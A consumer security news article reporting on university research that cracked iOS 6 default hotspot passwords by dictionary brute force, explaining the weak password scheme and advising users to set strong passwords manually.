These German Guys Can Crack Your iOS Hotspot Password in a Minute

You may want to think twice about using your iPhone as a wireless hotspot. A group of researchers from the Department Informatik at Friedrich-Alexander-Universität Erlangen-Nürnberg in Germany developed software allowing

You may want to think twice about using your iPhone as a wireless hotspot. A group of researchers from the Department Informatik at Friedrich-Alexander-Universität Erlangen-Nürnberg in Germany developed software allowing them to crack the Apple’s personal hotspot passwords in less than a minute.

hack_iphone_title_EN

As it turns out, Apple’s iOS generates weak, four to six character, word-based passwords so that it is easy for users to remember them. The words are followed by a four-digit number, but that does little to increase complexity. The problem with this sort of password authentication, of course, is that hackers can easily crack them (and they will), as proven by researchers Andreas Kurtz, Felix Freiling, and Daniel Metz when they managed to hijack iOS (version 6 and below) tethered wireless sessions with brute-force attacks in less than a minute.

A brute force attack, in this context, is one where a hacker (or researcher) uses a tool that attempts to guess a given password by entering every word in the dictionary into the password validation field.

Dictionary-based brute force attacks are pretty effective in general, although time-consuming and resource consuming. Not only do they test the strength of your password against every word in the English lexicon, but especially effective brute force attacks will also try spelling variations where numbers are substituted for letters in addition to groups of words and all the used-passwords they can round up from the various databases of breached passwords that have popped up over the last few years (there’s been a rash of data breaches in recent years where attackers have compromised lists of stored passwords from vulnerable servers and posted them on publically accessible forums).

A good password is more or less immune to brute force attacks. The primary weakness with Apple’s hotspot password generation is that it not only relies on words (so that the passwords will be easy to remember), but it relies on the incredibly limited amount of words with between four and six characters and the incredibly limited number of four-digit number combinations. For all intents and purposes, considering the processing power available to the researchers, this four-digit, numerical suffix has no meaningful impact on password complexity.

The primary weakness with Apple’s hotspot password generation is that it not only relies on words (so that the passwords will be easy to remember), but it relies on the incredibly limited amount of words with between four and six characters and the incredibly limited number of four-digit number combinations.

The researchers grabbed an open-source, Scrabble dictionary of just 52,500 four, five, and six letter words from the Internet and used it to perform their brute-force attack. There is a significantly larger amount of four, five, and six letter words floating around out there. Despite this, the researchers succeeded 100 percent of the time, but it took them as long as 49 minutes to crack the passwords.

The researchers weren’t satisfied with 49 minutes. It was too long. So after a bit of reverse engineering – I’ll spare you the specifics – the researchers found an English-language dictionary file within iOS that actually is responsible for developing these passwords. Interestingly, this is the very same dictionary that iOS uses to guess the words you are typing before you finish typing them. In other words, when you are halfway through typing a word and the full word or sometimes the wrong word pops up in a bubble above the text, this dictionary is what makes that feature possible. The researchers managed to narrow their 52,500 possible words down to a much more manageable 1,842 words that are actually taken into consideration.

That’s right. Apple’s iOS hotspot password is one of 1,842 words plus a four-digit, numerical suffix. This reality cut down the amount of time it took the researcher to break these hotspot passwords by 96 percent.

There’s more though: the researchers also determined that iOS’s algorithm for choosing one of these words is skewed and some words are chosen more often than others. The ten most frequently chosen words are: suave, subbed, headed, head, header, coal, ohms, coach, reach, and macaws. These top ten words are ten times more likely to be chosen as the default password than other words. This allowed the researchers to speed up the attack. All this knowledge along with some substantial computer power gave the researchers the capacity to reliably crack iOS hotspots in 50 seconds. If you’re curious, the cluster of computers they dedicated to this task offered 390,000 guesses per second.

I usually close these articles with a bit of advice on how to protect yourself. This time it is simple: you should manually setup a strong password for your iPhone-based WiFi hotspot. In fact, this appears to be a fairly versatile threat, so I’d avoid using a default password with any other phone or tablet too, because the researchers think that this attack-method probably works on a number of different mobile platforms

Tips